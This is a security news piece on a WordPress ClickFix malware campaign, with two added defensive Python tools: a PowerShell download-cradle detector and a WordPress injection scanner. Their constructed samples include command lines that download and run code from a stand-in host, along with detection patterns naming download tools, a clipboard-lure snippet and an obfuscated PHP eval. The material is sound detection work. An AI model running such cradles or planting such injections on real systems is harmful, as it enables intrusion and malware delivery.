Researchers have identified a shift in the delivery method of the so-called Lorem Ipsum malware campaign, which relies on compromised WordPress sites. The threat actors have pivoted to the 'ClickFix' technique, in which visitors are tricked into running malicious code themselves, presented to them as the fix for a fake error or update prompt.
New analysis links the campaign to the ransomware and data extortion group Vice Society, though attribution remains unconfirmed. The scale of the compromise and the number of affected sites have not been disclosed, but using widely trusted WordPress sites as the delivery channel expands the potential victim pool.
Attackers inject malicious scripts into legitimate WordPress sites, typically after gaining access through stolen credentials or unpatched plugins. When a visitor lands on a compromised page, a fake CAPTCHA or browser update notification instructs them to copy a PowerShell command and run it on their own machine; that command downloads the payload. No browser exploit is involved: the victim carries the code out of the browser sandbox by running it, so the lure's social engineering, not a flaw in the site or browser, is what does the work. Indicators of compromise on the endpoint include PowerShell launches that the user or their role cannot account for and outbound connections to known malicious domains.
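The endpoint-side indicators above are vague on their own (PowerShell runs constantly in most fleets), so the following added example, which is not code from the article or from any report on this campaign, shows one way to narrow them into a triage rule over process-creation telemetry. The event fields are a simplified, constructed stand-in for Sysmon Event ID 1 / Windows 4688; the command-line markers and the "interactive parent" heuristic are assumptions about how a pasted download cradle usually looks, not indicators published for this campaign. It also decodes `-EncodedCommand` arguments, since a base64-wrapped cradle would otherwise hide every marker from a plain substring match.

```python
"""Triage process-creation telemetry for ClickFix-style PowerShell launches.

Added example, not code from the article or from any vendor report on this
campaign. ProcEvent is a constructed stand-in for Sysmon Event ID 1 / 4688.
The markers and the interactive-parent heuristic are assumptions about what
a pasted download cradle usually looks like, not published indicators.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    image: str          # path of the new process
    parent_image: str   # path of the parent process
    command_line: str
    user: str


POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# A ClickFix victim types or pastes the command themselves, so the parent is a
# shell the user drives (Run dialog -> explorer.exe, or a terminal). Assumption.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

MARKERS = {
    # something that fetches a second stage from the network
    "fetch": re.compile(
        r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|curl|wget|mshta)\b"
        r"|download(string|file|data)|net\.webclient", re.I),
    # something that runs what was fetched
    "exec": re.compile(
        r"\b(iex|invoke-expression)\b"
        r"|-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    # flags that hide the window or skip profile/policy checks
    "evasion": re.compile(
        r"-w(indowstyle)?\s+hidden|-(nop|noprofile)\b|-(ep|executionpolicy)\s+bypass", re.I),
}
ENCODED_ARG = re.compile(r"-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def expand_encoded(command_line: str) -> str:
    """Append the decoded text of any -EncodedCommand argument so the markers
    can see through the base64/UTF-16LE wrapping PowerShell uses for it."""
    extra = []
    for m in ENCODED_ARG.finditer(command_line):
        try:
            extra.append(base64.b64decode(m.group(2)).decode("utf-16le", "ignore"))
        except ValueError:
            continue  # not valid base64, nothing to add
    return command_line + " " + " ".join(extra)


def classify(ev: ProcEvent) -> Optional[str]:
    """'clickfix' = download cradle launched from an interactive parent,
    'cradle' = download cradle launched some other way, None = not a cradle.
    A plain download with no execution or evasion flag is left alone."""
    if basename(ev.image) not in POWERSHELL_IMAGES:
        return None
    text = expand_encoded(ev.command_line)
    hits = {name for name, rx in MARKERS.items() if rx.search(text)}
    if "fetch" not in hits or not ({"exec", "evasion"} & hits):
        return None
    return "clickfix" if basename(ev.parent_image) in INTERACTIVE_PARENTS else "cradle"


def triage(events: List[ProcEvent]) -> List[Tuple[ProcEvent, str]]:
    """Return (event, verdict) for every event that is a cradle of some kind."""
    return [(ev, v) for ev in events if (v := classify(ev))]


# Constructed sample telemetry, not captured events. Hostnames use the
# reserved .example TLD.
_PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
_ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://update-check.example/p')"
    .encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    ProcEvent(_PS, r"C:\Windows\System32\svchost.exe",
              r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1", r"NT AUTHORITY\SYSTEM"),
    ProcEvent(_PS, r"C:\Windows\explorer.exe",
              'powershell.exe -NoProfile -Command "Get-Process | Sort-Object CPU"', r"CORP\admin"),
    ProcEvent(_PS, r"C:\Windows\explorer.exe",
              'powershell.exe -Command "iwr https://intranet.example/tool.zip -OutFile tool.zip"',
              r"CORP\admin"),
    ProcEvent(_PS, r"C:\Windows\explorer.exe",
              'powershell -w hidden -nop -c "iex (iwr -UseBasicParsing http://update-check.example/v.txt)"',
              r"CORP\jdoe"),
    ProcEvent(_PS, r"C:\Windows\System32\wscript.exe",
              "powershell.exe -nop -w hidden -enc " + _ENC, r"CORP\jdoe"),
]

if __name__ == "__main__":
    for ev, verdict in triage(SAMPLE_EVENTS):
        print(f"{verdict:9s} {ev.user:22s} {ev.command_line[:70]}")
```

The interactive-parent check is what separates a ClickFix victim from a scheduled task or a script host running the same cradle; both are worth a ticket, but the first tells you a person was socially engineered and the lure site should be hunted for in proxy logs.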
Because the campaign relies on compromising sites through stolen credentials and unpatched plugins rather than on a single software flaw, there is no one patch to apply. Site administrators should immediately rotate credentials, audit plugins and themes (updating or removing unmaintained ones and checking their files for injected code), and put a web application firewall in front of the site. Users should never run a command that a web page asks them to paste into a terminal or the Run dialog; no legitimate CAPTCHA or browser update works that way.
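"Audit plugins and themes" is easier to say than to do on a site with a few hundred PHP and JavaScript files, so here is an added example, not code from the article or from WordPress, of an offline scanner for the kinds of injection a copy-paste lure campaign leaves behind: a `<script>` pulled from a host the site does not normally use, clipboard writes in page JavaScript, obfuscated `eval` in PHP, and PHP files under `wp-content/uploads`. The rules and the allow-list of script hosts are the example's own assumptions, not indicators published for this campaign, and the sample site tree it scans is constructed inline. Run it against a fresh copy of the document root alongside `wp core verify-checksums` and `wp plugin verify-checksums --all`, which catch modified core and plugin files that these pattern rules would miss.

```python
"""Offline audit of a WordPress tree for injected code.

Added example, not code from the article or from WordPress. The rules encode
what a compromised site in a copy-paste lure campaign commonly contains; they
are assumptions, not indicators published for this campaign.
"""
import re
import tempfile
from pathlib import Path
from typing import List, Tuple

# Hosts the site legitimately loads scripts from: the site itself plus any CDN
# it really uses. Assumption; replace with your own list.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "cdnjs.cloudflare.com"}

SCRIPT_SRC = re.compile(r"<script[^>]*\ssrc=[\"']https?://([^/\"']+)", re.I)
RULES = [
    # eval() over a decoder is the classic shape of injected PHP
    ("php-eval-obfuscated", re.compile(
        r"\beval\s*\(\s*(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I)),
    # a lure that asks the visitor to paste a command usually puts it on the
    # clipboard for them (assumption)
    ("js-clipboard-write", re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*[\"']copy", re.I)),
    # decoders and char-code strings used to hide the payload from grep
    ("js-obfuscation", re.compile(
        r"\b(atob|unescape)\s*\(|String\.fromCharCode\s*\((\s*\d+\s*,){8,}", re.I)),
]
TEXT_SUFFIXES = {".php", ".js", ".html", ".htm"}


def scan_file(path: Path, root: Path) -> List[Tuple[str, str]]:
    """Return (relative path, rule name) for every rule the file trips."""
    rel = path.relative_to(root).as_posix()
    findings = []
    # executable code has no business under the uploads directory
    if path.suffix == ".php" and rel.startswith("wp-content/uploads/"):
        findings.append((rel, "php-in-uploads"))
    if path.suffix not in TEXT_SUFFIXES:
        return findings
    text = path.read_text(errors="ignore")
    for host in SCRIPT_SRC.findall(text):
        if host.lower() not in ALLOWED_SCRIPT_HOSTS:
            findings.append((rel, f"external-script:{host.lower()}"))
    for name, rx in RULES:
        if rx.search(text):
            findings.append((rel, name))
    return findings


def scan_tree(root: Path) -> List[Tuple[str, str]]:
    return sorted(f for p in root.rglob("*") if p.is_file() for f in scan_file(p, root))


# Constructed file contents for a toy site, not taken from any real compromise.
SAMPLE_SITE = {
    "wp-content/themes/shop/header.php":
        '<?php wp_head(); ?>\n'
        '<script src="https://shop.example/wp-includes/js/jquery.js"></script>\n',
    "wp-content/themes/shop/footer.php":
        '<?php wp_footer(); ?>\n'
        '<script src="https://static-verify.example/captcha.js"></script>\n'
        '<script>document.getElementById("cf").onclick=function(){'
        'navigator.clipboard.writeText(atob("cG93ZXJzaGVsbCAtdyBoaWRkZW4="))}</script>\n',
    "wp-content/plugins/seo-helper/seo.php":
        "<?php\nadd_action('init', function () { eval(base64_decode('ZWNobyAxOw==')); });\n",
    "wp-content/uploads/2024/05/banner.php":
        "<?php /* a PHP file where only images should be */ ?>\n",
    "wp-content/uploads/2024/05/banner.jpg": "not a real jpeg\n",
    "wp-content/themes/shop/assets/app.js":
        "document.addEventListener('DOMContentLoaded', () => console.log('ok'));\n",
}


def demo() -> List[Tuple[str, str]]:
    """Materialise the constructed sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        for rel, body in SAMPLE_SITE.items():
            f = root / rel
            f.parent.mkdir(parents=True, exist_ok=True)
            f.write_text(body)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, rule in demo():
        print(f"{rule:40s} {rel}")
```

A clean hit list is not proof of a clean site: an attacker with admin credentials can also plant a rogue administrator account or a mu-plugin, so pair the file scan with a review of `wp user list` output and the `wp-content/mu-plugins` directory before deciding the rotation and cleanup are complete.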
The broader threat landscape remains active, with ransomware groups increasingly adopting multiple extortion tactics and access brokers leveraging legitimate services for initial compromise. The Lorem Ipsum campaign's evolving delivery mechanism underscores the need for continuous monitoring of web assets.